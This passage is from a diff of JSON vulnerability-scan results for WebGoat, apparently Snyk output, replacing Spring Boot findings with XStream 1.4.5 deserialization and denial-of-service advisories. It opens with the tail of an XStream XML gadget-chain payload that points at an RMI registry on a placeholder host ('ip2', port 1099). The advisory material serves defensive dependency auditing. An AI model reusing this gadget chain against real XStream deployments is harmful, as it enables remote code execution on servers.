\u003ccandidates class='com.sun.jndi.rmi.registry.BindingEnumeration'\u003e\r\n                      \u003cnames\u003e\r\n                        \u003cstring\u003eaa\u003c/string\u003e\r\n                        \u003cstring\u003eaa\u003c/string\u003e\r\n                      \u003c/names\u003e\r\n                      \u003cctx\u003e\r\n                        \u003cenvironment/\u003e\r\n                        \u003cregistry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'\u003e\r\n                          \u003cjava.rmi.server.RemoteObject\u003e\r\n                            \u003cstring\u003eUnicastRef\u003c/string\u003e\r\n                            \u003cstring\u003eip2\u003c/string\u003e\r\n                            \u003cint\u003e1099\u003c/int\u003e\r\n                            \u003clong\u003e0\u003c/long\u003e\r\n                            \u003cint\u003e0\u003c/int\u003e\r\n                            \u003cshort\u003e0\u003c/short\u003e\r\n                            \u003cboolean\u003efalse\u003c/boolean\u003e\r\n                          \u003c/java.rmi.server.RemoteObject\u003e\r\n                        \u003c/registry\u003e\r\n                        \u003chost\u003eip2\u003c/host\u003e\r\n                        \u003cport\u003e1099\u003c/port\u003e\r\n                      \u003c/ctx\u003e\r\n                    \u003c/candidates\u003e\r\n                  \u003c/aliases\u003e\r\n                \u003c/it\u003e\r\n              \u003c/mm\u003e\r\n            \u003c/multiPart\u003e\r\n          \u003c/sm\u003e\r\n        \u003c/message\u003e\r\n      \u003c/value\u003e\r\n    \u003c/javax.naming.ldap.Rdn_-RdnEntry\u003e\r\n  \u003c/java.util.PriorityQueue\u003e\r\n\u003c/java.util.PriorityQueue\u003e\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n\u003e Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object i",
+          "evidence": [
+            {
+              "path": [
                 {
-                  "name": "org.springframework.boot:spring-boot-actuator-autoconfigure",
-                  "version": "3.1.5"
+                  "name": "org.owasp.webgoat:webgoat",
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
-                  "name": "org.springframework.boot:spring-boot-actuator",
-                  "version": "3.1.5"
+                  "name": "com.thoughtworks.xstream:xstream",
+                  "version": "1.4.5"
                 }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "0000005f-0000-4000-8000-00000000005f",
+          "key": "00000000-0000-0000-0000-000000000044",
           "locations": [
             {
               "package": {
-                "name": "org.springframework.boot:spring-boot-actuator",
-                "version": "3.1.5"
+                "name": "com.thoughtworks.xstream:xstream",
+                "version": "1.4.5"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 40
+          "problems": [
+            { "id": "CVE-2021-29505", "source": "cve" },
+            { "id": "CWE-502", "source": "cwe" },
+            { "id": "GHSA-7chv-rrw6-w6fc", "source": "ghsa" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.17)"],
+              "created_at": "2021-05-19T09:30:26.97764Z",
+              "credits": ["V3geB1rd"],
+              "cvss_base_score": 6.2,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 6.2,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T13:58:36.286767Z",
+                  "severity": "medium",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:H/A:H/E:P/RL:O"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 8.8,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:48:12.710147Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 7.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:48.472439Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 8.1,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:48:46.729752Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:H/A:H/E:P/RL:O",
+              "disclosed_at": "2021-05-18T18:36:27Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.99596",
+                "probability": "0.90769"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Nuclei Templates", "Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1294540",
+              "initially_fixed_in_versions": ["1.4.17"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2025-11-19T05:03:28.640695Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2021-05-19T15:48:11.124631Z",
+              "references": [
+                {
+                  "title": "GitHub Commit",
+                  "url": "https://github.com/x-stream/xstream/commit/f0c4a8d861b68ffc3119cfbbbd632deee624e227"
+                },
+                {
+                  "title": "XStream Advisory",
+                  "url": "https://x-stream.github.io/CVE-2021-29505.html"
+                },
+                {
+                  "title": "Nuclei Templates",
+                  "url": "https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-29505.yaml"
+                }
+              ],
+              "severity": "medium",
+              "source": "snyk_vuln"
             }
-          },
-          "title": "Denial of Service (DoS)"
+          ],
+          "rating": { "severity": "medium" },
+          "risk": { "risk_score": { "value": 514 } },
+          "title": "Deserialization of Untrusted Data"
         },
-        "id": "0000005f-0000-4000-8000-00000000005f",
+        "id": "00000000-0000-0000-0000-000000000044",
         "links": {},
         "relationships": {
           "fix": {
@@ -17170,25 +7351,17 @@
               "attributes": {
                 "action": {
                   "format": "upgrade_package_advice",
-                  "package_name": "org.springframework.boot:spring-boot-actuator",
+                  "package_name": "com.thoughtworks.xstream:xstream",
                   "upgrade_paths": [
                     {
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-actuator",
-                          "version": "3.1.6"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-actuator-autoconfigure",
-                          "version": "3.1.6"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
-                          "name": "org.springframework.boot:spring-boot-actuator",
-                          "version": "3.1.6"
+                          "name": "com.thoughtworks.xstream:xstream",
+                          "version": "1.4.17"
                         }
                       ],
                       "is_drop": false
@@ -17197,7 +7370,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "0000005f-0000-4000-8000-00000000005f",
+              "id": "00000000-0000-0000-0000-000000000044",
               "type": "fixes"
             }
           }
@@ -17207,50 +7380,138 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n\nAffected versions of this package are vulnerable to Improper Input Validation via the `EndpointRequest.to()` function that creates a matcher for `null/**` if the actuator endpoint, for which the `EndpointRequest` has been created, is disabled or not exposed.\n\n**Note:**\n\nThis is only exploitable if all of the following conditions are met:\n\n1) `EndpointRequest.to()` has been used in a Spring Security chain configuration;\n\n2) The endpoint which `EndpointRequest` references is disabled or not exposed via web;\n\n3) Your application handles requests to `/null` and this path needs protection.\n\n## Workaround\n\nThis can be mitigated by either:\n\n1) Making sure that the endpoint to which `EndpointRequest.to()` is referring to is enabled and exposed via web;\n\n2) Make sure that you don't handle requests to `/null`.\n## Remediation\nUpgrade `org.springframework.boot:spring-boot-actuator-autoconfigure` to version 3.3.11, 3.4.5 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-boot/commit/55f67c9a522647039fd3294dee5cb83f4888160a)\n- [Spring Security Advisory](https://spring.io/security/cve-2025-22235)\n",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack overflow.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.20 or higher.\n## References\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/fe215b33fbc68ab1a6aa526e00ca607926bb3737)\n- [GitHub Issue](https://github.com/x-stream/xstream/issues/314)\n",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-actuator",
-                  "version": "3.1.5"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
-                  "name": "org.springframework.boot:spring-boot-actuator-autoconfigure",
-                  "version": "3.1.5"
+                  "name": "com.thoughtworks.xstream:xstream",
+                  "version": "1.4.5"
                 }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "00000060-0000-4000-8000-000000000060",
+          "key": "00000000-0000-0000-0000-000000000045",
           "locations": [
             {
               "package": {
-                "name": "org.springframework.boot:spring-boot-actuator-autoconfigure",
-                "version": "3.1.5"
+                "name": "com.thoughtworks.xstream:xstream",
+                "version": "1.4.5"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 202
-            }
-          },
-          "title": "Improper Input Validation"
+          "problems": [
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[0,1.4.20)"],
+              "created_at": "2022-10-31T13:11:26.972623Z",
+              "credits": ["Václav Haisman"],
+              "cvss_base_score": 5.3,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 5.3,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T14:07:26.139623Z",
+                  "severity": "medium",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 7.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:51:40.132066Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 7.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:57.223914Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 5.9,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:04.698042Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
+              "disclosed_at": "2022-10-31T13:06:51Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.47618",
+                "probability": "0.00245"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "not defined",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "not defined",
+                    "type": "primary"
+                  }
+                ],
+                "sources": []
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-3091180",
+              "initially_fixed_in_versions": ["1.4.20"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2024-03-11T09:53:57.223914Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2022-10-31T16:12:20.720386Z",
+              "references": [
+                {
+                  "title": "GitHub Commit",
+                  "url": "https://github.com/x-stream/xstream/commit/fe215b33fbc68ab1a6aa526e00ca607926bb3737"
+                },
+                {
+                  "title": "GitHub Issue",
+                  "url": "https://github.com/x-stream/xstream/issues/314"
+                }
+              ],
+              "severity": "medium",
+              "source": "snyk_vuln"
+            },
+            { "id": "CWE-400", "source": "cwe" },
+            { "id": "GHSA-3mq5-fq9h-gj7j", "source": "ghsa" },
+            { "id": "CVE-2022-40151", "source": "cve" }
+          ],
+          "rating": { "severity": "medium" },
+          "risk": { "risk_score": { "value": 53 } },
+          "title": "Denial of Service (DoS)"
         },
-        "id": "00000060-0000-4000-8000-000000000060",
+        "id": "00000000-0000-0000-0000-000000000045",
         "links": {},
         "relationships": {
           "fix": {
@@ -17258,21 +7519,17 @@
               "attributes": {
                 "action": {
                   "format": "upgrade_package_advice",
-                  "package_name": "org.springframework.boot:spring-boot-actuator-autoconfigure",
+                  "package_name": "com.thoughtworks.xstream:xstream",
                   "upgrade_paths": [
                     {
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-actuator",
-                          "version": "3.3.11"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
-                          "name": "org.springframework.boot:spring-boot-actuator-autoconfigure",
-                          "version": "3.3.11"
+                          "name": "com.thoughtworks.xstream:xstream",
+                          "version": "1.4.20"
                         }
                       ],
                       "is_drop": false
@@ -17281,7 +7538,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "00000060-0000-4000-8000-000000000060",
+              "id": "00000000-0000-0000-0000-000000000045",
               "type": "fixes"
             }
           }
@@ -17291,50 +7548,148 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Incorrect Authorization via the `AnnotationsScanner` and `AnnotatedMethod` class. An attacker can gain unauthorized access to sensitive information by exploiting improper resolution of annotations on methods within type hierarchies that use parameterized supertypes with unbounded generics.\r\n\r\n**Note:**\r\nThis is only exploitable if security annotations are used on methods in generic superclasses or generic interfaces and the `@EnableMethodSecurity` feature is enabled.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 6.2.11 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/6d710d482a6785b069e35022e81758953afc21ff)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/35342)\n- [GitHub Release](https://github.com/spring-projects/spring-framework/releases/tag/v6.2.11)\n- [Vendor Advisory](https://spring.io/security/cve-2025-41249)\n",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Insecure XML deserialization. It could deserialize arbitrary user-supplied XML content, representing objects of any type. A remote attacker able to pass XML to XStream could use this flaw to perform a variety of attacks, including remote code execution in the context of the server running the XStream application.\n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.7, 1.4.11 or higher.\n## References\n- [Dinis Cruz Blog](http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html)\n- [Exploit DB](https://www.exploit-db.com/exploits/39193)\n- [Fisheye](https://fisheye.codehaus.org/changelog/xstream?cs=2210)\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/6344867dce6767af7d0fe34fb393271a6456672d)\n- [Redhat Bugzilla](https://bugzilla.redhat.com/CVE-2013-7285)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1051277)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2013/CVE-2013-7285.yaml)\n",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
-                  "name": "org.springframework.boot:spring-boot-starter-test",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework:spring-core",
-                  "version": "6.0.13"
+                  "name": "com.thoughtworks.xstream:xstream",
+                  "version": "1.4.5"
                 }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "00000061-0000-4000-8000-000000000061",
+          "key": "00000000-0000-0000-0000-000000000046",
           "locations": [
             {
               "package": {
-                "name": "org.springframework:spring-core",
-                "version": "6.0.13"
+                "name": "com.thoughtworks.xstream:xstream",
+                "version": "1.4.5"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 110
+          "problems": [
+            { "id": "CVE-2013-7285", "source": "cve" },
+            { "id": "CWE-94", "source": "cwe" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.7)", "[1.4.10,1.4.11)"],
+              "created_at": "2019-09-04T13:59:15.268423Z",
+              "credits": ["Dinis Cruz"],
+              "cvss_base_score": 4.8,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 4.8,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T13:57:42.359284Z",
+                  "severity": "medium",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N/E:F/RL:O/RC:C"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 9.8,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:15.799398Z",
+                  "severity": "critical",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 6.3,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:48:20.659893Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N/E:F/RL:O/RC:C",
+              "disclosed_at": "2013-12-22T16:22:18Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.94272",
+                "probability": "0.15054"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "functional",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["ExploitDB", "Nuclei Templates", "Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-460764",
+              "initially_fixed_in_versions": ["1.4.7", "1.4.11"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2025-11-19T05:04:21.060655Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2016-12-25T16:51:50Z",
+              "references": [
+                {
+                  "title": "Dinis Cruz Blog",
+                  "url": "http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html"
+                },
+                {
+                  "title": "Exploit DB",
+                  "url": "https://www.exploit-db.com/exploits/39193"
+                },
+                {
+                  "title": "Fisheye",
+                  "url": "https://fisheye.codehaus.org/changelog/xstream?cs=2210"
+                },
+                {
+                  "title": "GitHub Commit",
+                  "url": "https://github.com/x-stream/xstream/commit/6344867dce6767af7d0fe34fb393271a6456672d"
+                },
+                {
+                  "title": "Redhat Bugzilla",
+                  "url": "https://bugzilla.redhat.com/CVE-2013-7285"
+                },
+                {
+                  "title": "RedHat Bugzilla Bug",
+                  "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1051277"
+                },
+                {
+                  "title": "Nuclei Templates",
+                  "url": "https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2013/CVE-2013-7285.yaml"
+                }
+              ],
+              "severity": "medium",
+              "source": "snyk_vuln"
             }
-          },
-          "title": "Incorrect Authorization"
+          ],
+          "rating": { "severity": "medium" },
+          "risk": { "risk_score": { "value": 200 } },
+          "title": "Insecure XML deserialization"
         },
-        "id": "00000061-0000-4000-8000-000000000061",
+        "id": "00000000-0000-0000-0000-000000000046",
         "links": {},
         "relationships": {
           "fix": {
@@ -17342,21 +7697,17 @@
               "attributes": {
                 "action": {
                   "format": "upgrade_package_advice",
-                  "package_name": "org.springframework:spring-core",
+                  "package_name": "com.thoughtworks.xstream:xstream",
                   "upgrade_paths": [
                     {
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
-                          "name": "org.springframework.boot:spring-boot-starter-test",
-                          "version": "3.4.10"
-                        },
-                        {
-                          "name": "org.springframework:spring-core",
-                          "version": "6.2.11"
+                          "name": "com.thoughtworks.xstream:xstream",
+                          "version": "1.4.7"
                         }
                       ],
                       "is_drop": false
@@ -17365,7 +7716,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "00000061-0000-4000-8000-000000000061",
+              "id": "00000000-0000-0000-0000-000000000046",
               "type": "fixes"
             }
           }
@@ -17374,4 +7725,4 @@
       }
     ]
   }
-]
\ No newline at end of file
+]